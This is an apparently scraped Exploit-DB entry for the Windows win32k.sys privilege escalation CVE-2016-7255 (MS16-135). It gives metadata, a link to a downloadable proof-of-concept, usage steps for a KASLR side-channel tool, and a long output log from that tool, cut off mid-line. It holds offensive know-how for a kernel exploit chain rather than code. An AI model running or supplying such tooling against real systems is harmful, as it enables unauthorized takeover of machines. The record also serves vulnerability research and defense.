{"id": "EDB-ID:40823", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)", "description": "Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-135). CVE-2016-7255. Local exploit for Windows platform", "published": "2016-11-24T00:00:00", "modified": "2016-11-24T00:00:00", "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 7.2}, "href": "https://www.exploit-db.com/exploits/40823/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2016-7255"], "lastseen": "2016-11-24T17:23:17", "viewCount": 153, "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2016-11-24T17:23:17", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-7255"]}, {"type": "seebug", "idList": ["SSV:92530"]}, {"type": "symantec", "idList": ["SMNTC-94064"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786206", "MYHACK58:62201682548", "MYHACK58:62201784568"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139701", "PACKETSTORM:140468"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3A596E79FE66F4077B2897D4B2D5D53B", "EXPLOITPACK:1395F02807B421A9A8880862CED5BAB3", "EXPLOITPACK:3FDA4C818CF6EA61DD6359696752E123"]}, {"type": "zdt", "idList": ["1337DAY-ID-26645", "1337DAY-ID-26414", "1337DAY-ID-26297"]}, {"type": "exploitdb", "idList": ["EDB-ID:40745", "EDB-ID:41015"]}, {"type": "thn", "idList": ["THN:89E2A7A39CBD630AB15218875ED90D19", "THN:F8BDC767F3D202913920E1C28D137377"]}, {"type": "mscve", "idList": ["MS:CVE-2016-7255"]}, {"type": "fireeye", "idList": ["FIREEYE:3E714A2B7BA85E8C1459F38BE1BC289A", "FIREEYE:8B4453AF3FA94076D63CCBDB94AFC782", "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294"]}, {"type": "canvas", "idList": ["MS16_135"]}, {"type": "mmpc", "idList": ["MMPC:11F96360F6FFA25D4AC7028A2E9CAA9D"]}, {"type": "mskb", "idList": ["KB3199135"]}, {"type": "nessus", "idList": ["SMB_NT_MS16-135.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310809092"]}, {"type": "securelist", "idList": ["SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7"]}, {"type": "threatpost", "idList": ["THREATPOST:F10810414F1898BE0159A069C1B719B2"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7"]}, {"type": "kaspersky", "idList": ["KLA11832", "KLA10897"]}], "modified": "2016-11-24T17:23:17", "rev": 2}, "vulnersScore": 5.2}, "sourceHref": "https://www.exploit-db.com/download/40823/", "sourceData": "Complete Proof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40823.zip\r\n\r\nPresentation:\r\nhttps://www.exploit-db.com/docs/40822.pdf\r\n\r\n\r\nI Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016\r\n\r\nRequirements\r\n\r\nIntel Processor (Haswell or newer)\r\nWindows 10 x64\r\nUsage\r\n\r\nRun ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:\r\n\r\nC:\\Users\\qa\\Desktop>ASLRSideChannelAttack.exe\r\n+] Setting thread affinity to CPU 0\r\n+] Getting all the potential PML4 SelfRef\r\n+] Mapping a page oracle\r\n+] Allocating probing target pages...\r\nAllocation 0: 0000020E339D0000\r\nAllocation 1: 0000020E339E0000\r\nAllocation 2: 0000020E339F0000\r\nAllocation 3: 0000020E33A00000\r\nAllocation 4: 0000020E33A10000\r\n--------------------------\r\n+] Check that Unammped and Mapped values are consistent across several executions!\r\n--------------------------\r\nUnmapped Initial: 256.683746\r\nMapped Initial: 203.692978\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.440018\r\nMapped: 202.827560\r\n--------------------------\r\n\r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175\r\n+] PTE FFFF810804020100 looks mapped! - Time: 204.740097\r\n+] Removing 102 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF81C0E0703818\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874\r\nTime difference exceed for ffff818804020100, retrying...\r\n+] PTE FFFF818804020100 looks mapped! - Time: 209.071213\r\n+] Removing 103 from initial array and pushing it into final array\r\nTime difference exceed for ffff824120904820, retrying...\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642\r\nTime difference exceed for ffff82010719cf00, retrying...\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263\r\n+] PTE FFFF820804020100 looks mapped! - Time: 204.585739\r\n+] Removing 104 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003\r\nTime difference exceed for ffff8341a0d06830, retrying...\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126\r\n+] PTE FFFF830804020100 looks mapped! - Time: 193.314758\r\n+] Removing 106 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816\r\n+] PTE FFFF838804020100 looks mapped! - Time: 204.008743\r\n+] Removing 107 from initial array and pushing it into final array\r\nTime difference exceed for ffff89c4e2713898, retrying...\r\nTime difference exceed for ffff8bc5e2f178b8, retrying...\r\nTime difference exceed for ffff8c46231188c0, retrying...\r\nUnmapped Initial: 248.508636\r\nMapped Initial: 207.139847\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 236.360733\r\nMapped: 195.650040\r\n--------------------------\r\n\r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363\r\nPotential SelfRef: FFFF81C0E0703818\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393\r\nTime difference exceed for ffff81810719cf00, retrying...\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160\r\n+] PTE FFFF818804020100 looks mapped! - Time: 195.728439\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF81C0E0703818 - Index: 103\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff818000000000\r\n-] Erasing 103 from final array\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143\r\n+] PTE FFFF820804020100 looks mapped! - Time: 198.158585\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff820000000000\r\n-] Erasing 104 from final array\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034\r\n+] PTE FFFF830804020100 looks mapped! - Time: 197.613953\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff830000000000\r\n-] Erasing 106 from final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nUnmapped Initial: 232.123840\r\nMapped Initial: 196.420654\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 234.845581\r\nMapped: 187.862518\r\n--------------------------\r\n\r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182\r\n+] PTE FFFF810804020100 looks mapped! - Time: 199.812225\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff810000000000\r\nTime difference exceed for ffff810000000000, retrying...\r\n-] Erasing 102 from final array\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 230.247162\r\nMapped Initial: 198.023987\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 235.923035\r\nMapped: 191.605301\r\n--------------------------\r\n\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 258.041046\r\nMapped Initial: 210.309753\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 238.757538\r\nMapped: 203.896240\r\n--------------------------\r\n\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763\r\n+] PTE FFFF838804020100 looks mapped! - Time: 203.243607\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff838000000000\r\n-] Erasing 107 from final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639\r\n+] PTE FFFF828804020100 looks mapped! - Time: 196.754044\r\n+] Removing 105 from initial array and pushing it into final array\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff90c864321908, retrying...\r\nUnmapped Initial: 257.754272\r\nMapped Initial: 207.903702\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.145935\r\nMapped: 207.792923\r\n--------------------------\r\n\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796\r\n+] PTE FFFF828804020100 looks mapped! - Time: 208.765045\r\nPML4e: FFFF82C160B05828 - Index: 105\r\nKNOWN_UNMAPPED PTE: ffff828000000000\r\n-] Erasing 105 from final array\r\n-] Removing 100 as it seems to be unmapped\r\n-] Removing 101 as it seems to be unmapped\r\n-] Removing 108 as it seems to be unmapped\r\n-] Removing 109 as it seems to be unmapped\r\n-] Removing 10a as it seems to be unmapped\r\n-] Removing 10b as it seems to be unmapped\r\n-] Removing 10c as it seems to be unmapped\r\n-] Removing 10d as it seems to be unmapped\r\nTime difference exceed for ffff8743a1d0e870, retrying...\r\n-] Removing 10e as it seems to be unmapped\r\n-] Removing 10f as it seems to be unmapped\r\n-] Removing 110 as it seems to be unmapped\r\nTime difference exceed for ffff88c462311888, retrying...\r\n-] Removing 111 as it seems to be unmapped\r\n-] Removing 112 as it seems to be unmapped\r\n-] Removing 113 as it seems to be unmapped\r\nTime difference exceed for ffff8a45229148a0, retrying...\r\n-] Removing 114 as it seems to be unmapped\r\n-] Removing 115 as it seems to be unmapped\r\n-] Removing 116 as it seems to be unmapped\r\n-] Removing 117 as it seems to be unmapped\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffe8f47a3d1e88, retrying...\r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 211.636246\r\n+] Removing 1ec from initial array and pushing it into final array\r\nUnmapped Initial: 233.678802\r\nMapped Initial: 214.496124\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 250.585373\r\nMapped: 213.339661\r\n--------------------------\r\n\r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926\r\nPML4e: FFFFF67B3D9ECF60 - Index: 1ec\r\nKNOWN_UNMAPPED PTE: fffff60000000000\r\nReal PML4 SelfRef Found: fffff67b3d9ecf60\r\nLeft in Potential Array: ffff8c46231188c0\r\nLeft in Potential Array: ffff8cc6633198c8\r\nLeft in Potential Array: ffff8d46a351a8d0\r\nLeft in Potential Array: ffff8dc6e371b8d8\r\nLeft in Potential Array: ffff8e472391c8e0\r\nLeft in Potential Array: ffff8ec763b1d8e8\r\nLeft in Potential Array: ffff8f47a3d1e8f0\r\nLeft in Potential Array: ffff8fc7e3f1f8f8\r\nLeft in Potential Array: ffff904824120900\r\nLeft in Potential Array: ffff90c864321908\r\nLeft in Potential Array: ffff9148a4522910\r\nLeft in Potential Array: ffff91c8e4723918\r\nLeft in Potential Array: ffff924924924920\r\nLeft in Potential Array: ffff92c964b25928\r\nLeft in Potential Array: ffff9349a4d26930\r\nLeft in Potential Array: ffff93c9e4f27938\r\nLeft in Potential Array: ffff944a25128940\r\nLeft in Potential Array: ffff94ca65329948\r\nLeft in Potential Array: ffff954aa552a950\r\nLeft in Potential Array: ffff95cae572b958\r\nLeft in Potential Array: ffff964b2592c960\r\nLeft in Potential Array: ffff96cb65b2d968\r\nLeft in Potential Array: ffff974ba5d2e970\r\nLeft in Potential Array: ffff97cbe5f2f978\r\nLeft in Potential Array: ffff984c26130980\r\nLeft in Potential Array: ffff98cc66331988\r\nLeft in Potential Array: ffff994ca6532990\r\nLeft in Potential Array: ffff99cce6733998\r\nLeft in Potential Array: ffff9a4d269349a0\r\nLeft in Potential Array: ffff9acd66b359a8\r\nLeft in Potential Array: ffff9b4da6d369b0\r\nLeft in Potential Array: ffff9bcde6f379b8\r\nLeft in Potential Array: ffff9c4e271389c0\r\nLeft in Potential Array: ffff9cce673399c8\r\nLeft in Potential Array: ffff9d4ea753a9d0\r\nLeft in Potential Array: ffff9dcee773b9d8\r\nLeft in Potential Array: ffff9e4f2793c9e0\r\nLeft in Potential Array: ffff9ecf67b3d9e8\r\nLeft in Potential Array: ffff9f4fa7d3e9f0\r\nLeft in Potential Array: ffff9fcfe7f3f9f8\r\nLeft in Potential Array: ffffa05028140a00\r\nLeft in Potential Array: ffffa0d068341a08\r\nLeft in Potential Array: ffffa150a8542a10\r\nLeft in Potential Array: ffffa1d0e8743a18\r\nLeft in Potential Array: ffffa25128944a20\r\nLeft in Potential Array: ffffa2d168b45a28\r\nLeft in Potential Array: ffffa351a8d46a30\r\nLeft in Potential Array: ffffa3d1e8f47a38\r\nLeft in Potential Array: ffffa45229148a40\r\nLeft in Potential Array: ffffa4d269349a48\r\nLeft in Potential Array: ffffa552a954aa50\r\nLeft in Potential Array: ffffa5d2e974ba58\r\nLeft in Potential Array: ffffa6532994ca60\r\nLeft in Potential Array: ffffa6d369b4da68\r\nLeft in Potential Array: ffffa753a9d4ea70\r\nLeft in Potential Array: ffffa7d3e9f4fa78\r\nLeft in Potential Array: ffffa8542a150a80\r\nLeft in Potential Array: ffffa8d46a351a88\r\nLeft in Potential Array: ffffa954aa552a90\r\nLeft in Potential Array: ffffa9d4ea753a98\r\nLeft in Potential Array: ffffaa552a954aa0\r\nLeft in Potential Array: ffffaad56ab55aa8\r\nLeft in Potential Array: ffffab55aad56ab0\r\nLeft in Potential Array: ffffabd5eaf57ab8\r\nLeft in Potential Array: ffffac562b158ac0\r\nLeft in Potential Array: ffffacd66b359ac8\r\nLeft in Potential Array: ffffad56ab55aad0\r\nLeft in Potential Array: ffffadd6eb75bad8\r\nLeft in Potential Array: ffffae572b95cae0\r\nLeft in Potential Array: ffffaed76bb5dae8\r\nLeft in Potential Array: ffffaf57abd5eaf0\r\nLeft in Potential Array: ffffafd7ebf5faf8\r\nLeft in Potential Array: ffffb0582c160b00\r\nLeft in Potential Array: ffffb0d86c361b08\r\nLeft in Potential Array: ffffb158ac562b10\r\nLeft in Potential Array: ffffb1d8ec763b18\r\nLeft in Potential Array: ffffb2592c964b20\r\nLeft in Potential Array: ffffb2d96cb65b28\r\nLeft in Potential Array: ffffb359acd66b30\r\nLeft in Potential Array: ffffb3d9ecf67b38\r\nLeft in Potential Array: ffffb45a2d168b40\r\nLeft in Potential Array: ffffb4da6d369b48\r\nLeft in Potential Array: ffffb55aad56ab50\r\nLeft in Potential Array: ffffb5daed76bb58\r\nLeft in Potential Array: ffffb65b2d96cb60\r\nLeft in Potential Array: ffffb6db6db6db68\r\nLeft in Potential Array: ffffb75badd6eb70\r\nLeft in Potential Array: ffffb7dbedf6fb78\r\nLeft in Potential Array: ffffb85c2e170b80\r\nLeft in Potential Array: ffffb8dc6e371b88\r\nLeft in Potential Array: ffffb95cae572b90\r\nLeft in Potential Array: ffffb9dcee773b98\r\nLeft in Potential Array: ffffba5d2e974ba0\r\nLeft in Potential Array: ffffbadd6eb75ba8\r\nLeft in Potential Array: ffffbb5daed76bb0\r\nLeft in Potential Array: ffffbbddeef77bb8\r\nLeft in Potential Array: ffffbc5e2f178bc0\r\nLeft in Potential Array: ffffbcde6f379bc8\r\nLeft in Potential Array: ffffbd5eaf57abd0\r\nLeft in Potential Array: ffffbddeef77bbd8\r\nLeft in Potential Array: ffffbe5f2f97cbe0\r\nLeft in Potential Array: ffffbedf6fb7dbe8\r\nLeft in Potential Array: ffffbf5fafd7ebf0\r\nLeft in Potential Array: ffffbfdfeff7fbf8\r\nLeft in Potential Array: ffffc06030180c00\r\nLeft in Potential Array: ffffc0e070381c08\r\nLeft in Potential Array: ffffc160b0582c10\r\nLeft in Potential Array: ffffc1e0f0783c18\r\nLeft in Potential Array: ffffc26130984c20\r\nLeft in Potential Array: ffffc2e170b85c28\r\nLeft in Potential Array: ffffc361b0d86c30\r\nLeft in Potential Array: ffffc3e1f0f87c38\r\nLeft in Potential Array: ffffc46231188c40\r\nLeft in Potential Array: ffffc4e271389c48\r\nLeft in Potential Array: ffffc562b158ac50\r\nLeft in Potential Array: ffffc5e2f178bc58\r\nLeft in Potential Array: ffffc6633198cc60\r\nLeft in Potential Array: ffffc6e371b8dc68\r\nLeft in Potential Array: ffffc763b1d8ec70\r\nLeft in Potential Array: ffffc7e3f1f8fc78\r\nLeft in Potential Array: ffffc86432190c80\r\nLeft in Potential Array: ffffc8e472391c88\r\nLeft in Potential Array: ffffc964b2592c90\r\nLeft in Potential Array: ffffc9e4f2793c98\r\nLeft in Potential Array: ffffca6532994ca0\r\nLeft in Potential Array: ffffcae572b95ca8\r\nLeft in Potential Array: ffffcb65b2d96cb0\r\nLeft in Potential Array: ffffcbe5f2f97cb8\r\nLeft in Potential Array: ffffcc6633198cc0\r\nLeft in Potential Array: ffffcce673399cc8\r\nLeft in Potential Array: ffffcd66b359acd0\r\nLeft in Potential Array: ffffcde6f379bcd8\r\nLeft in Potential Array: ffffce673399cce0\r\nLeft in Potential Array: ffffcee773b9dce8\r\nLeft in Potential Array: ffffcf67b3d9ecf0\r\nLeft in Potential Array: ffffcfe7f3f9fcf8\r\nLeft in Potential Array: ffffd068341a0d00\r\nLeft in Potential Array: ffffd0e8743a1d08\r\nLeft in Potential Array: ffffd168b45a2d10\r\nLeft in Potential Array: ffffd1e8f47a3d18\r\nLeft in Potential Array: ffffd269349a4d20\r\nLeft in Potential Array: ffffd2e974ba5d28\r\nLeft in Potential Array: ffffd369b4da6d30\r\nLeft in Potential Array: ffffd3e9f4fa7d38\r\nLeft in Potential Array: ffffd46a351a8d40\r\nLeft in Potential Array: ffffd4ea753a9d48\r\nLeft in Potential Array: ffffd56ab55aad50\r\nLeft in Potential Array: ffffd5eaf57abd58\r\nLeft in Potential Array: ffffd66b359acd60\r\nLeft in Potential Array: ffffd6eb75badd68\r\nLeft in Potential Array: ffffd76bb5daed70\r\nLeft in Potential Array: ffffd7ebf5fafd78\r\nLeft in Potential Array: ffffd86c361b0d80\r\nLeft in Potential Array: ffffd8ec763b1d88\r\nLeft in Potential Array: ffffd96cb65b2d90\r\nLeft in Potential Array: ffffd9ecf67b3d98\r\nLeft in Potential Array: ffffda6d369b4da0\r\nLeft in Potential Array: ffffdaed76bb5da8\r\nLeft in Potential Array: ffffdb6db6db6db0\r\nLeft in Potential Array: ffffdbedf6fb7db8\r\nLeft in Potential Array: ffffdc6e371b8dc0\r\nLeft in Potential Array: ffffdcee773b9dc8\r\nLeft in Potential Array: ffffdd6eb75badd0\r\nLeft in Potential Array: ffffddeef77bbdd8\r\nLeft in Potential Array: ffffde6f379bcde0\r\nLeft in Potential Array: ffffdeef77bbdde8\r\nLeft in Potential Array: ffffdf6fb7dbedf0\r\nLeft in Potential Array: ffffdfeff7fbfdf8\r\nLeft in Potential Array: ffffe070381c0e00\r\nLeft in Potential Array: ffffe0f0783c1e08\r\nLeft in Potential Array: ffffe170b85c2e10\r\nLeft in Potential Array: ffffe1f0f87c3e18\r\nLeft in Potential Array: ffffe271389c4e20\r\nLeft in Potential Array: ffffe2f178bc5e28\r\nLeft in Potential Array: ffffe371b8dc6e30\r\nLeft in Potential Array: ffffe3f1f8fc7e38\r\nLeft in Potential Array: ffffe472391c8e40\r\nLeft in Potential Array: ffffe4f2793c9e48\r\nLeft in Potential Array: ffffe572b95cae50\r\nLeft in Potential Array: ffffe5f2f97cbe58\r\nLeft in Potential Array: ffffe673399cce60\r\nLeft in Potential Array: ffffe6f379bcde68\r\nLeft in Potential Array: ffffe773b9dcee70\r\nLeft in Potential Array: ffffe7f3f9fcfe78\r\nLeft in Potential Array: ffffe8743a1d0e80\r\nLeft in Potential Array: ffffe8f47a3d1e88\r\nLeft in Potential Array: ffffe974ba5d2e90\r\nLeft in Potential Array: ffffe9f4fa7d3e98\r\nLeft in Potential Array: ffffea753a9d4ea0\r\nLeft in Potential Array: ffffeaf57abd5ea8\r\nLeft in Potential Array: ffffeb75badd6eb0\r\nLeft in Potential Array: ffffebf5fafd7eb8\r\nLeft in Potential Array: ffffec763b1d8ec0\r\nLeft in Potential Array: ffffecf67b3d9ec8\r\nLeft in Potential Array: ffffed76bb5daed0\r\nLeft in Potential Array: ffffedf6fb7dbed8\r\nLeft in Potential Array: ffffee773b9dcee0\r\nLeft in Potential Array: ffffeef77bbddee8\r\nLeft in Potential Array: ffffef77bbddeef0\r\nLeft in Potential Array: ffffeff7fbfdfef8\r\nLeft in Potential Array: fffff0783c1e0f00\r\nLeft in Potential Array: fffff0f87c3e1f08\r\nLeft in Potential Array: fffff178bc5e2f10\r\nLeft in Potential Array: fffff1f8fc7e3f18\r\nLeft in Potential Array: fffff2793c9e4f20\r\nLeft in Potential Array: fffff2f97cbe5f28\r\nLeft in Potential Array: fffff379bcde6f30\r\nLeft in Potential Array: fffff3f9fcfe7f38\r\nLeft in Potential Array: fffff47a3d1e8f40\r\nLeft in Potential Array: fffff4fa7d3e9f48\r\nLeft in Potential Array: fffff57abd5eaf50\r\nLeft in Potential Array: fffff5fafd7ebf58\r\nLeft in Potential Array: fffff6fb7dbedf68\r\nLeft in Potential Array: fffff77bbddeef70\r\nLeft in Potential Array: fffff7fbfdfeff78\r\nLeft in Potential Array: fffff87c3e1f0f80\r\nLeft in Potential Array: fffff8fc7e3f1f88\r\nLeft in Potential Array: fffff97cbe5f2f90\r\nLeft in Potential Array: fffff9fcfe7f3f98\r\nLeft in Potential Array: fffffa7d3e9f4fa0\r\nLeft in Potential Array: fffffafd7ebf5fa8\r\nLeft in Potential Array: fffffb7dbedf6fb0\r\nLeft in Potential Array: fffffbfdfeff7fb8\r\nLeft in Potential Array: fffffc7e3f1f8fc0\r\nLeft in Potential Array: fffffcfe7f3f9fc8\r\nLeft in Potential Array: fffffd7ebf5fafd0\r\nLeft in Potential Array: fffffdfeff7fbfd8\r\nLeft in Potential Array: fffffe7f3f9fcfe0\r\nLeft in 